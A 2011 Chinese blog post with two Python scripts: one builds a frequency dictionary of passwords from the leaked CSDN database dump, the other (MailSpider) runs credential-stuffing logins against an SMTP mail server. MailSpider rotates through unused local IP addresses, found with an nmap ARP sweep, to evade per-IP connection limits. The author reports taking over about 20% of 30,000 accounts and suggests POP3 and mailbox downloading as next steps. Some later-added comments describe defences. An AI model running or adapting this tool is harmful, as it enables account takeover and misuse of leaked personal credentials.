好吧,本来就是比较邪恶之物,看得懂的同学就看呗.手痒编辑了一下,高手请略过^_^
'''
@file: PswList_Csdn.py
@auth: GaA.Ra
@date: 2011.12.23
@ver : Python3.2
'''
# Shared between AnalyzeData (writer) and SaveResult (reader): a list of
# [count, password_bytes] pairs, most frequent first once it has been filled.
g_ResultList = list()
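def AnalyzeData():
    """Tally how often each password occurs in the dump file.

    Reads ``www.youkuaiyun.com.sql`` from the current directory in binary
    mode, one record per line.  Fields are separated by ``b' # '`` and the
    second field is taken as the password.  The tally is stored in the
    module-level ``g_ResultList`` as ``[count, password_bytes]`` pairs,
    sorted with the most frequent password first.

    The input holds plaintext passwords, so the dump and everything derived
    from it should be handled as sensitive data.  A frequency table of this
    kind can serve as the input for a common-password deny-list.
    """
    global g_ResultList
    print(' [*] Begin to Analyze Password...')
    tally = {}
    # `with` releases the handle even if a record raises part-way through.
    with open('www.youkuaiyun.com.sql', 'rb') as fileDB:
        for dbRecord in fileDB:
            fields = dbRecord.strip().split(b' # ')
            if len(fields) < 2:
                # Blank or malformed line: there is no password field to
                # count, and indexing it would abort the whole run.
                continue
            password = fields[1]
            tally[password] = tally.get(password, 0) + 1
    # Lists compare element-wise, so sorting [count, password] pairs in
    # reverse orders by count first and by password bytes on ties.
    g_ResultList = sorted(([seen, pwd] for pwd, seen in tally.items()),
                          reverse=True)
    print(' [*] All Done...')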
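def SaveResult():
    """Write every password counted more than twice to ``PasswordList-Csdn.txt``.

    Iterates the module-level ``g_ResultList`` (``[count, password_bytes]``
    pairs) and writes one ``password count`` line per entry whose count is
    greater than 2.  Entries whose bytes cannot be decoded, or whose text
    cannot be encoded for the output file, are skipped.

    The output is a list of plaintext passwords and should be stored with
    the same care as the dump it was derived from.
    """
    global g_ResultList
    print(' [*] Begin to Save Result...')
    # `with` flushes and closes the output file; the original left the
    # handle open and relied on interpreter clean-up to write the data out.
    with open('PasswordList-Csdn.txt', 'w') as fileResult:
        for count, password in g_ResultList:
            if count <= 2:
                continue
            try:
                print(password.decode(), str(count), file=fileResult)
            except (UnicodeEncodeError, UnicodeDecodeError):
                # Not representable as text in this environment: skip it.
                continue
    print(' [*] All Done...')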
if __name__ == '__main__':
    # Two phases, in order: build the tally, then write the frequency list.
    for _phase in (AnalyzeData, SaveResult):
        _phase()
'''
@file: MailSpider.py
@auth: GaA.Ra
@date: 2011.12.23
@ver : Python3.2
For LinuxOS only, BackTrack5 Best
'''
import os
import sys
from os.path import isfile
from smtplib import SMTP
from smtplib import SMTPAuthenticationError as AuthError
from smtplib import SMTPConnectError as ConnError
# Module-wide state shared by the functions below.
g_WorkingPath = os.getcwd()
# File that successful logins are appended to.
g_ResultDBName = 'Result'
# Sequence number printed in front of each result line.
g_ResultCount = 1
# Index of the next credential record; global so that a later MailSpider()
# call continues where the previous one stopped.
g_TryIndex = 0
# File holding the credential records, one per line.
g_MailDBName = 'Data'
g_MailDBList = None
# Placeholder host name; not every mail provider offers SMTP.
g_MailServer = 'smtp.xxx.com'
# Default gateway of the local network; set this to your own.
g_GateWay = '192.168.1.1'
# Cursor into g_IPList, and the list of candidate source addresses.
g_IPCount = 0
g_IPList = []
# Print the banner, make sure the result file exists, then build the
# candidate address list (GetIPList) and load the credential records
# (GetMailDBList).
# NOTE(review): the listing lost its indentation on this page; the code
# lines are kept exactly as published.
def Init():
global g_ResultDBName
print(' MailSpider0.1 GaA.Ra ')
# Create an empty result file on first use; an existing one is left alone.
if not isfile(g_ResultDBName):
file = open(g_ResultDBName, 'w')
file.close()
GetIPList()
GetMailDBList()
def PrintError(Message):
    """Print *Message* to stdout behind the ' [!] ' error marker."""
    line = ' [!] ' + Message
    print(line)
def PrintStatus(Message):
    """Print *Message* to stdout behind the ' [*] ' status marker."""
    line = ' [*] ' + Message
    print(line)
# Reassign eth0 to the address IP with a 255.255.255.0 netmask and re-add
# the default route through g_GateWay by shelling out to ifconfig and route.
# Prompts for the gateway when g_GateWay is None. A non-zero exit status
# from any of the three commands is only reported; nothing is returned.
#
# NOTE(review): IP and g_GateWay are concatenated into shell command lines
# without any validation.
# NOTE(review): the host takes addresses it was not assigned, so the mail
# server sees the attempts spread over several source addresses of one /24
# and a per-IP connection limit alone does not bound them. On the access
# network, DHCP snooping with IP source guard / dynamic ARP inspection is
# the usual control against a port sourcing traffic from self-assigned
# addresses.
def ChangeIP(IP):
global g_GateWay
PrintStatus('Changing IP...' + IP)
if g_GateWay == None:
g_GateWay = input(' [*] GateWay: ')
ret1 = os.system('ifconfig eth0 down')
ret2 = os.system('ifconfig eth0 ' + IP + ' netmask 255.255.255.0 up')
ret3 = os.system('route add default gw ' + g_GateWay)
if ret1 !=0 or ret2 !=0 or ret3 != 0:
PrintError('ChangeIP Error...')
# Return the next candidate address from g_IPList (whitespace stripped) and
# advance the g_IPCount cursor. Once the list is exhausted, print an error
# and return None.
def GetIP():
global g_IPCount
global g_IPList
if g_IPCount < len(g_IPList):
IP = g_IPList[g_IPCount].strip()
g_IPCount += 1
return IP
else:
PrintError('Out of ip address...')
return None
# Fill g_IPList with the addresses of the gateway's /24 that did not show up
# in a scan. The scan is an nmap run with ARP ping (-PR) against
# g_GateWay/24; its "report" lines are written to result.txt, and the last
# dot-separated component of the last word of each line is collected as a
# host number. Every number from 1 to 254 that is not in that set is
# appended to g_IPList, prefixed with the gateway's first three octets.
# A failed scan is only reported; result.txt is opened regardless.
#
# NOTE(review): g_GateWay is concatenated into a shell command line without
# validation.
# NOTE(review): an ARP sweep of a whole /24 from one host, followed by that
# host using many addresses of the segment, should be visible in switch and
# ARP monitoring on the local network - confirm against what the site logs.
def GetIPList():
global g_GateWay
ret = os.system('nmap -p 80 -PR ' + g_GateWay + '/24 | grep report > result.txt')
if ret != 0:
PrintError('Nmap Scan Error...')
resultSet = set()
scanResult = open('result.txt', 'r')
for line in scanResult:
line = line.strip()
line = line.split(' ')[-1]
line = line.split('.')[-1]
resultSet.add(line)
scanResult.close()
os.system('rm result.txt')
for x in range(1, 255):
x = str(x)
if x not in resultSet:
x = g_GateWay[0:g_GateWay.rfind('.') + 1] + x
g_IPList.append(x)
# Load every line of the file named by g_MailDBName into g_MailDBList as
# bytes objects. The file handle is not closed in this function.
def GetMailDBList():
global g_MailDBList
global g_MailDBName
mailDBFile = open(g_MailDBName, 'rb')
g_MailDBList = mailDBFile.readlines()
# Open a new SMTP connection to g_MailServer and attempt one login with
# User / Pass.
#   - success: a numbered "user / password" line is written to ResultFile
#     and True is returned;
#   - SMTPAuthenticationError: the connection is closed, False is returned;
#   - KeyboardInterrupt: ResultFile is flushed and closed, the process exits.
# Other exceptions, SMTPConnectError included, are not handled here and
# reach the caller.
#
# NOTE(review): every attempt is its own connection carrying a single AUTH,
# so on the server side this shows up as many short sessions with one login
# attempt each. Per-account failure counters and screening of passwords
# against known breach data address that pattern; a per-IP connection limit
# by itself only slows it down.
# NOTE(review): results are stored as plaintext credentials in ResultFile.
def TryLogin(Index, User, Pass, ResultFile):
global g_ResultCount
global g_MailServer
try:
mailServer = SMTP(g_MailServer)
print(' [*] Try Login: ',Index, User, Pass, end = '')
mailServer.login(User, Pass)
print(' --> Success...')
print('%05d user: %s password: %s' % (g_ResultCount, User, Pass), file = ResultFile)
mailServer.quit()
return True
except AuthError:
print(' ')
mailServer.quit()
return False
except KeyboardInterrupt:
PrintStatus('User Exiting...')
ResultFile.flush()
ResultFile.close()
sys.exit()
# Walk the loaded credential records starting at the global g_TryIndex and
# call TryLogin for each one. A record is decoded, stripped and split on a
# single space; the first field is used as the user name, the second as the
# password.
# Returns True when the records are used up (the loop ends, or a record has
# fewer than two fields and raises IndexError). Returns False when the
# connection fails with SMTPConnectError, after flushing and closing the
# result file; Run() reacts to that by moving to the next address.
#
# NOTE(review): the listing lost its indentation on this page, so the exact
# nesting - in particular whether the `g_TryIndex += 1` after `pass` sits
# inside the else branch - cannot be determined from the text. The code
# lines are kept exactly as published.
def MailSpider():
global g_ResultDBName
global g_MailDBName
global g_ResultCount
global g_MailDBList
global g_TryIndex
resultFile = open(g_ResultDBName, 'a')
for tryIndex in range(0, len(g_MailDBList)):
try:
acountData = g_MailDBList[g_TryIndex].decode().strip().split(' ')
userName = acountData[0]
passWord = acountData[1]
except IndexError:
return True
except UnicodeDecodeError:
# Undecodable record: skip it and move on to the next index.
print('UnicodeDecodeError...Continue...')
g_TryIndex += 1
continue
try:
trySuccess = TryLogin(g_TryIndex, userName, passWord, resultFile)
if trySuccess == True:
g_ResultCount += 1
else:
pass
g_TryIndex += 1
except ConnError:
resultFile.flush()
resultFile.close()
return False
return True
# Driver: Init(), then loop - take the next candidate address, stop when
# none is left, otherwise switch to it and call MailSpider().
# KeyboardInterrupt ends the run; any other exception is reported and the
# loop goes on. When MailSpider() returns True the run is finished.
#
# The loop only moves to a new address after MailSpider() returns False,
# i.e. after the server refused a connection, so its pace is set by the
# server's per-IP limit rather than by any per-account limit.
# NOTE(review): the listing lost its indentation on this page, so the
# nesting of `if finish:` relative to the while loop is inferred, not shown.
def Run():
Init()
while True:
IP = GetIP()
if IP == None:
break
else:
ChangeIP(IP)
try:
finish = MailSpider()
except KeyboardInterrupt:
return
except:
print('May be IP crash or Connect timeout...Continue...')
if finish:
PrintStatus('All Done...')
return
# Script entry point: run the driver only when executed directly.
if __name__ == '__main__':
Run()
PswList是统计弱密码的,出现3次以上的就记录下来.这个字典也算是有16w条.
MailSpider切换IP对于拥有独立IP的同学来说比较方便,我是校园网,而且学校这边是独立IP,SO...之所以要切换IP,主要是因为某些服务器会对单个IP的最大连接次数进行限制.换个角度看,这也说明服务器只按来源IP限制连接次数是不够的,还需要按账号限制登录失败次数.
nmap扫描主要是用ARP扫出所在网段的存活主机,grep得到存活主机所在的结果,过滤一下(利用set集合操作)得到可以切的IP,存起来.切IP用的是ifconfig和route两个命令.某数字邮箱服务器大概在700+次连接的时候会提示IP连接次数过多,拒绝连接请求,人肉测试大概受限期是1个小时左右(吃个饭回来看多一集好汉两个半就过去了- -)
一天(12个小时),在实验室那边,网络时好时坏的,大概干了30000条数据,成功率大概是20%左右(好吧,我收集到大概10000条数据),觉得也就这样了,大家不要拿来做坏事啵.或许可以写个脚本把邮件都down下来本地然后进行数据挖掘.需要的只是时间而已.
PS:除了SMTP协议,POP3协议都可以拿来XXX,不过POP3协议的速度比SMTP慢大概10倍(非精确值),聪明的同学你懂的^ ^